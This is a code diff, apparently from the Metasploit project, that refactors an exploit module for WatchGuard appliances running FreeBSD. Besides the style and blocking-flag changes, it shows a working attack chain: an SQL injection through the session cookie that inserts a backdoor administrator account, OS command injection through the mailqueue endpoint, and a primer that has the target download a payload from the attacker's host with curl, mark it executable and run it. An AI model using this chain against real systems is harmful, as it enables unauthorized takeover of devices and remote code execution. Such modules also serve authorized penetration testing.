Fixing blocking option

Author: jvazquez-r7

modules/exploits/freebsd/http/watchguard_cmd_exec.rb

@@ -77,27 +77,29 @@ def check
 
 
   def exploit
-    #Get a valid session by logging in or exploiting SQLi to add user
+    # Get a valid session by logging in or exploiting SQLi to add user
+    print_status('Getting a valid session...')
     @sid = get_session
+    print_status('Successfully logged in')
 
-    #Check if cmd injection works
+    # Check if cmd injection works
     test_cmd_inj = send_cmd_exec('/ADMIN/mailqueue.spl', 'id')
     unless test_cmd_inj && test_cmd_inj.body.include?('uid=65534')
       fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable')
     end
 
-    #We have cmd exec, stand up an HTTP server and deliver the payload
+    # We have cmd exec, stand up an HTTP server and deliver the payload
     vprint_status('Getting ready to drop binary on appliance')
 
     @elf_sent = false
-    #Generate payload
+    # Generate payload
     @pl = generate_payload_exe
 
     if @pl.nil?
       fail_with(Failure::BadConfig, 'Please select a native bsd payload')
     end
 
-    #Start the server and use primer to trigger fetching and running of the payload
+    # Start the server and use primer to trigger fetching and running of the payload
     begin
       Timeout.timeout(datastore['HTTPDELAY']) { super }
     rescue Timeout::Error
@@ -111,7 +113,7 @@ def attempt_login(username, pwd_clear)
       'uri' => normalize_uri(target_uri.path, '/login.spl')
     })
 
-    unless get_login_hash and get_login_hash.body
+    unless get_login_hash && get_login_hash.body
       fail_with(Failure::Unreachable, 'Could not get login page.')
     end
 
@@ -147,12 +149,10 @@ def attempt_login(username, pwd_clear)
     })
 
 
-    unless login and login.body =~ /<title>Loading...<\/title>/
+    unless login && login.body && login.body.include?('<title>Loading...</title>')
       return nil
     end
 
-    print_status('Successfully logged in')
-
     sid_cookie
   end
 
@@ -163,14 +163,14 @@ def add_user(user_id, username, pwd_hash, pwd_clear)
       'cookie' => "sid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(#{user_id}, '#{username}', '#{pwd_hash}', 0, 'server_admin', 0, 0)--"
     })
 
-    unless res and res.body
+    unless res && res.body
       fail_with(Failure::Unreachable, "Could not connect to host")
     end
 
-    if res.body =~ /ERROR:  duplicate key value violates unique constraint/
+    if res.body.include?('ERROR:  duplicate key value violates unique constraint')
       print_status("Added backdoor user, credentials => #{username}:#{pwd_clear}")
     else
-      fail_with(Failure::UnexpectedReply, "Unable to add user to database")
+      fail_with(Failure::UnexpectedReply, 'Unable to add user to database')
     end
 
     true
@@ -186,24 +186,30 @@ def generate_device_hash(cleartext_password)
     final_hash
   end
 
-  def send_cmd_exec(uri, os_cmd, blocking = false)
+  def send_cmd_exec(uri, os_cmd, blocking = true)
     #This is a handler function that makes HTTP calls to exploit the command injection issue
     unless @sid
       fail_with(Failure::Unknown, 'Missing a session cookie when attempting to execute command.')
     end
 
-    res = send_request_cgi({
+    opts = {
       'uri' => normalize_uri(target_uri.path, "#{uri}"),
       'cookie' => "sid=#{@sid}",
       'encode_params' => true,
       'vars_get' => {
         'f' => 'dnld',
         'id' => ";#{os_cmd}"
       }
-    })
+    }
+
+    if blocking
+      res = send_request_cgi(opts)
+    else
+      res = send_request_cgi(opts, 1)
+    end
 
     #Handle cmd exec failures
-    if res.nil? && blocking == false
+    if res.nil? && blocking
       fail_with(Failure::Unknown, 'Failed to exploit command injection.')
     end
 
@@ -217,19 +223,20 @@ def get_session
     user_id = rand(999)
 
     sid_cookie = attempt_login(username, pwd_clear)
-    unless sid_cookie
-      vprint_status('Failed to login, attempting to add backdoor user...')
-      pwd_hash = generate_device_hash(pwd_clear)
 
-      unless add_user(user_id, username, pwd_hash, pwd_clear)
-        fail_with(Failure::Unknown, 'Failed to add user account to database.')
-      end
+    return sid_cookie unless sid_cookie.nil?
 
-      sid_cookie = attempt_login(username, pwd_clear)
+    vprint_error('Failed to login, attempting to add backdoor user...')
+    pwd_hash = generate_device_hash(pwd_clear)
+
+    unless add_user(user_id, username, pwd_hash, pwd_clear)
+      fail_with(Failure::Unknown, 'Failed to add user account to database.')
+    end
 
-      unless sid_cookie
-          fail_with(Failure::Unknown, 'Unable to login with user account.')
-      end
+    sid_cookie = attempt_login(username, pwd_clear)
+
+    unless sid_cookie
+      fail_with(Failure::Unknown, 'Unable to login with user account.')
     end
 
     sid_cookie
@@ -245,9 +252,9 @@ def primer
     filename = rand_text_alpha_lower(8)
     print_status("Sending download request for #{payload_uri}")
 
-    dnld_cmd1 = "/usr/local/sbin/curl -k #{payload_uri} -o /tmp/#{filename}"
-    vprint_status("Telling appliance to run #{dnld_cmd1}")
-    send_cmd_exec('/ADMIN/mailqueue.spl', dnld_cmd1)
+    download_cmd = "/usr/local/sbin/curl -k #{payload_uri} -o /tmp/#{filename}"
+    vprint_status("Telling appliance to run #{download_cmd}")
+    send_cmd_exec('/ADMIN/mailqueue.spl', download_cmd)
     register_file_for_cleanup("/tmp/#{filename}")
 
     chmod_cmd = "chmod +x /tmp/#{filename}"
@@ -256,9 +263,10 @@ def primer
 
     exec_cmd = "/tmp/#{filename}"
     vprint_status('Running the payload...')
-    send_cmd_exec('/ADMIN/mailqueue.spl', exec_cmd, true)
+    send_cmd_exec('/ADMIN/mailqueue.spl', exec_cmd, false)
 
-    vprint_status('Finished primer hook')
+    vprint_status('Finished primer hook, raising Timeout::Error manually')
+    raise(Timeout::Error)
   end
 
   #Handle incoming requests from the server